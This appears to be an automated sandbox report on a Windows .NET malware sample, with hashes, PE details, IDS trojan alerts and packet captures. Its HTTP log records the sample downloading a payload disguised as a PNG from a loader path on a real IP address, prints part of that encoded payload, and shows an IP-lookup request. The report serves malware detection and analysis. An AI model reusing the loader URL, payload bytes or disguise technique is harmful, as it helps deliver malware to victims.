                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):1572864
                                                                  Entropy (8bit):4.2885780282691135
                                                                  Encrypted:false
                                                                  SSDEEP:12288:vO9cbh3B/ajZn88nAxgqSZsAHrxAESy7QNFiOOhEpnAWoluGHpa27fia:29cbh3B/ajZ88nUgjOvV
                                                                  MD5:8E05E7F43676C7E7554CE400BB3708D2
                                                                  SHA1:4BFD88B7A40EFF41007CE1E33F4BEA7D17EF99FF
                                                                  SHA-256:4D2A709CA2517D6452FB2C75A23C608AB08E54B00BE1BD9019897C799341B5BD
                                                                  SHA-512:23D14481F9F5FAE202779C9528252D73B14CE587D12641557C2B0A343C58B47B7D5794B1D5352714C3F80F0D8F6DED4D1AB32A7FCD893E83F0500D96A89410EF
                                                                  Malicious:false
                                                                  Preview:regf^...^...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.l.b]..................................................................................................................................................................................................................................................................................................................................................?........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Windows\appcompat\Programs\Amcache.hve.LOG1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):24576
                                                                  Entropy (8bit):3.7766688936339796
                                                                  Encrypted:false
                                                                  SSDEEP:384:GH5/+allFBA+Pe6rIpnQ86TVgGZu+DODvkZgeh/y:GZ/+allPA+RSQ8gVgGUhDvMh/
                                                                  MD5:E25D54B2C0B8D3662545B661024A269D
                                                                  SHA1:42B614D849D974FF11E3FC3AC2EC7251D1620066
                                                                  SHA-256:EA05F2F80A0815A762DF50342CB6DDC664BE2B94FE0A7810EEABEF3F69A55745
                                                                  SHA-512:FCA9852FE0B5F73C9C174041458FA5ADA9D69637AB0FF4F7C2E558F79F8D2863CC0F03A5A1E735E74D26DFB2E39D7B638109BE0FEEB6B4817F5380C93AA6321B
                                                                  Malicious:false
                                                                  Preview:regf]...]...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.l.b]..................................................................................................................................................................................................................................................................................................................................................?HvLE.^......]...........h~.">.a....%p_............................. ..hbin................p.\..,..........nk,....b]................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ....b]....... ........................... .......Z.......................Root........lf......Root....nk ....b]....................}.............. ...............*...............DeviceCensus........................vk..................WritePermissionsCheck...

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):3.9223154746791433
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:BPL_1000572_007.bat.exe
                                                                  File size:23552
                                                                  MD5:4ff4a281a08a0681597794a3024fb584
                                                                  SHA1:d3a70362b238b82db1ef1aefef920afedf717880
                                                                  SHA256:a6db7e8c70adc90b74c0f08503f49cf041d79afed3b916676892725ce2dbcce0
                                                                  SHA512:9ede8eea5cb5e07187300c221bb9312dcd63e96f10b44697a50bebf02f18a793b67fab05a990c48dbdef32264c89f5c0d0fa553609e2f2191009af138c42ddb8
                                                                  SSDEEP:96:4Mpiii13IvUthN9COsR/jaUF/oAmhftQ8Sxxxxr1yFzuzVzdWzizx0zgz8yuzH+n:hhC3IvULPCOujXHmo8ng7LKPisdk
                                                                  TLSH:54B2B5D223945D2BF8A79978E4B36E5308B4660DCE029B1E38F3394ACE60DDC356479D
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.,c.....................J......./... ...@....@.. ....................................@................................

                                                                  File Icon

                                                                  Icon Hash:5d1b136664165369

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x402f82
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x632C1756 [Thu Sep 22 08:05:42 2022 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2f280x57.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x4768.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xf880x1000False0.563720703125data5.374029477198112IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x40000x47680x4800False0.1265190972222222data3.0679650449494593IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xa0000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_ICON0x41300x4028data
                                                                  RT_GROUP_ICON0x81580x14data
                                                                  RT_VERSION0x816c0x448data
                                                                  RT_MANIFEST0x85b40x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  192.168.2.6185.252.178.6349707802034631 09/23/22-07:59:51.380310TCP2034631ET TROJAN Maldoc Activity (set)4970780192.168.2.6185.252.178.63
                                                                  192.168.2.6185.252.178.6349712802034631 09/23/22-08:01:54.005892TCP2034631ET TROJAN Maldoc Activity (set)4971280192.168.2.6185.252.178.63
                                                                  192.168.2.6185.252.178.6349715802034631 09/23/22-08:02:01.550542TCP2034631ET TROJAN Maldoc Activity (set)4971580192.168.2.6185.252.178.63
                                                                  192.168.2.6185.252.178.6349710802034631 09/23/22-08:01:29.985260TCP2034631ET TROJAN Maldoc Activity (set)4971080192.168.2.6185.252.178.63
                                                                  192.168.2.6185.252.178.6349711802034631 09/23/22-08:01:37.884830TCP2034631ET TROJAN Maldoc Activity (set)4971180192.168.2.6185.252.178.63

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Sep 23, 2022 07:59:51.344363928 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.372694016 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.372813940 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.380310059 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.421509981 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.421602011 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.421665907 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.421688080 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.421730042 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.421777010 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.421788931 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.421850920 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.421886921 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.421907902 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.421964884 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.422000885 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.422025919 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.422085047 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.422120094 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.450649023 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.450762987 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.450793982 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.450815916 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.450849056 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.450851917 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.450880051 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.450881958 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.450912952 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.450917959 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.450941086 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.450968027 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.450973034 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.450995922 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.451024055 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.451030970 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.451052904 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.451081038 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.451086998 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.451108932 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.451137066 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.451143026 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.451164007 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.451190948 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.451200008 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.451220036 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.451246977 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.451257944 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.451276064 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.451311111 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482064962 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482139111 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482182980 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482199907 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482227087 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482270002 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482270956 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482312918 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482355118 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482362032 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482394934 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482429981 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482439041 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482480049 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482522011 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482527018 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482573032 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482610941 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482614994 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482656956 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482692957 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482697010 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482737064 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482772112 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482777119 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482816935 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482851028 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482856989 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482898951 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482934952 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482937098 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482976913 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483011007 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.483015060 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483053923 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483093023 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483093977 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.483133078 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483167887 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.483175039 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483217001 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483251095 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.483257055 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483295918 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483331919 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.483335972 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483423948 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483464956 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.483467102 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483506918 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483540058 CEST4970780192.168.2.6185.252.178.63

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Sep 23, 2022 08:01:19.545746088 CEST5859553192.168.2.68.8.8.8
                                                                  Sep 23, 2022 08:01:19.563647985 CEST53585958.8.8.8192.168.2.6

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Sep 23, 2022 08:01:19.545746088 CEST192.168.2.68.8.8.80xe558Standard query (0)showip.netA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Sep 23, 2022 08:01:19.563647985 CEST8.8.8.8192.168.2.60xe558No error (0)showip.net162.55.60.2A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • 185.252.178.63
                                                                  • showip.net

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.649707185.252.178.6380C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 23, 2022 07:59:51.380310059 CEST99OUTGET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1
                                                                  Host: 185.252.178.63
                                                                  Connection: Keep-Alive
                                                                  Sep 23, 2022 07:59:51.421509981 CEST101INHTTP/1.1 200 OK
                                                                  Date: Fri, 23 Sep 2022 05:59:51 GMT
                                                                  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                                  Last-Modified: Thu, 22 Sep 2022 08:05:33 GMT
                                                                  ETag: "bf400-5e93f8695c45a"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 783360
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: image/png
                                                                  Data Raw: 1e 22 f6 68 76 74 76 69 6e 63 70 72 93 9e 64 53 c0 66 68 75 74 76 69 6a 23 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 d3 78 66 68 7b 6b cc 67 6a d7 79 bf 4d d9 65 1f b5 47 3c 1d 1d 05 49 1a 11 1f 15 1e 00 09 73 1b 07 06 1b 1b 02 49 08 06 50 00 19 0f 44 3a 16 46 2c 3a 27 56 04 05 07 15 5c 61 6c 6e 77 78 66 68 75 74 76 69 3a 26 70 72 20 60 67 53 39 71 44 16 74 76 69 6a 63 70 72 6c 81 64 5d 59 6d 69 73 74 76 85 61 63 70 74 6c 61 64 53 78 66 ee 7f 78 76 69 4a 63 70 72 4c 6d 64 53 78 26 68 75 54 76 69 6a 61 70 72 68 61 64 53 78 66 68 75 70 76 69 6a 63 70 72 6c 61 04 5f 78 66 6a 75 74 76 69 6a 63 73 72 2c e4 64 53 68 66 68 65 74 76 69 6a 73 70 72 7c 61 64 53 78 66 68 65 74 76 69 6a 63 70 72 6c 61 64 53 54 6c 64 75 23 76 69 6a 63 50 7e 6c 35 67 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 35 78 76 65 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 73 78 66 60 75 74 76 69 6a 63 70 72 6c 61 64 5b 58 66 68 3d 74 76 69 6a 63 70 72 6c 61 64 53 56 12 0d 0d 00 76 69 6a ef 9a 79 6c 61 44 53 78 66 84 7e 74 76 6b 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 49 6a 63 10 5c 1e 12 16 30 78 66 68 21 77 76 69 6a 43 7c 72 6c 65 64 53 78 88 63 75 74 76 69 6a 63 70 72 6c 61 64 53 78 26 68 75 34 58 1b 0f 0f 1f 11 6c 61 68 53 78 66 68 35 78 76 69 68 63 70 72 9e 6a 64 53 78 66 68 75 74 76 69 6a 63 70 72 2c 61 64 11 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 0e 62 79 74 76 69 6a 63 38 72 6c 61 66 53 7d 66 4c 14 7e 76 61 c3 62 70 73 6c 61 64 53 78 66 68 fd 03 74 69 f6 8a 77 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 6a 5a 6a 70 65 6c 61 64 53 78 66 68 63 58 73 7f 46 6a 5b 7c 44 63 64 53 7e 4d 9c 5d 6c 76 69 6c 48 70 58 6c 67 4e 53 78 65 58 7f 74 67 69 6a 63 70 72 6c 61 66 45 6e 4a 60 53 5c 68 69 6a 69 5b 71 4a 4a 92 79 78 66 68 76 44 7d 69 0f 63 70 72 6c 61 64 53 7a 4e 76 75 74 7c 6a 47 65 03 6d 6c 61 6e 29 7b 09 4d 70 74 70 45 6c 10 50 72 6c 6b 1e 51 7b 73 45 58 52 50 6b 69 0c 57 77 6c 67 e9 42 78 66 69 62 59 55 4f 4c 61 72 5a 6a 61 64 55 61 4b 76 53 52 74 6b 42 64 70 72 6a 1c 60 53 78 62 43 60 09 77 69 6a 67 5b bc 11 63 64 53 7c 4d b0 08 77 76 69 6e 48 ad 58 6c 61 64 50 48 6c 68 63 74 76 69 6a 63 70 72 6e 79 7a 7e 75 40 13 74 74 76 6d 05 45 75 72 6a 4a 67 75 53 97 42 75 74 75 59 60 63 69 72 6c 61 64 53 78 66 6a 69 6f 5b 79 4c 18 71 72 6c 65 0b 74 7d 66 6e 6a 7e 2f 42 69 45 5b 9c 46 61 64 53 7b 56 62 75 65 76 69 6a 63 70 72 6c 63 7c 46 55 6e 4e 0e 77 76 69 6e 48 73 54 47 97 4e 53 78 66 6b 45 7e 76 78 6a 63 70 72 6c 61 64 51 62 7b 45 7d 52 0d 6d 6a 63 74 59 6f 47 4f a5 52 66 68 75 77 46 63 6a 49 70 72 6c 61 64 53 78 64 7e 60 59 6d 4f 69 75 66 5e 74 47 60 4e 60 4b 7d 53 71 78 6d 64 66 7e 74 44 6a 64 53 7e 4d 61 53 5f 95 4f 41 85 56 59 85 4b 64 53 6b 56 63 75 0b 76 69 6a 62 70 72 7d 63 1f 52 78 66 6c 1a 53 73 69 6c 7f 5d 37 4a 63 1f 51 78 66 6c 62 59 48 4f 68 18 71 72 6c 65 67 57 7d 61 7e
                                                                  Data Ascii: "hvtvincprdSfhutvij#prladSxfhutvijcprladSxfhutvijcprladxfh{kgjyMeG<IsIPD:F,:'V\alnwxfhutvi:&pr `gS9qDtvijcprld]YmistvacptladSxfxviJcprLmdSx&huTvijaprhadSxfhupvijcprla_xfjutvijcsr,dShfhetvijspr|adSxfhetvijcprladSTldu#vijcP~l5gSxfhutvijcprladSxfh5xvejcprladSxfhutvijcprladSxfhutvijcprladSxfhutvijcprladsxf`utvijcprlad[Xfh=tvijcprladSVvijylaDSxf~tvkjcprladSxfhutvIjc\0xfh!wvijC|rledSxcutvijcprladSx&hu4XlahSxfh5xvihcprjdSxfhutvijcpr,adxfhutvijcprladSxbytvijc8rlafS}fL~vabpsladSxfhtiwrladSxfhutvijcprladSxfhutvijcprladSxfhutvjZjpeladSxfhcXsFj[|DcdS~M]lvilHpXlgNSxeXtgijcprlafEnJ`S\hiji[qJJyxfhvD}icprladSzNvut|jGemlan){MptpElPrlkQ{sEXRPkiWwlgBxfibYUOLarZjadUaKvSRtkBdprj`SxbC`wijg[cdS|MwvinHXladPHlhctvijcprnyz~u@ttvmEurjJguSButuY`cirladSxfjio[yLqrlet}fnj~/BiE[FadS{Vbuevijcprlc|FUnNwvinHsTGNSxfkE~vxjcprladQb{E}RmjctYoGORfhuwFcjIprladSxd~`YmOiuf^tG`N`K}Sqxmdf~tDjdS~MaS_OAVYKdSkVcuvijbpr}cRxflSsil]7JcQxflbYHOhqrlegW}a~


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.649708162.55.60.280C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 23, 2022 08:01:19.684577942 CEST920OUTGET / HTTP/1.1
                                                                  User-Agent: Project1sqlite
                                                                  Host: showip.net
                                                                  Sep 23, 2022 08:01:19.708090067 CEST922INHTTP/1.1 200 OK
                                                                  Access-Control-Allow-Headers: *
                                                                  Access-Control-Allow-Methods: *
                                                                  Access-Control-Allow-Origin: *
                                                                  Content-Type: text/html;charset=utf-8
                                                                  Date: Fri, 23 Sep 2022 06:01:19 GMT
                                                                  Server: Caddy
                                                                  Transfer-Encoding: chunked
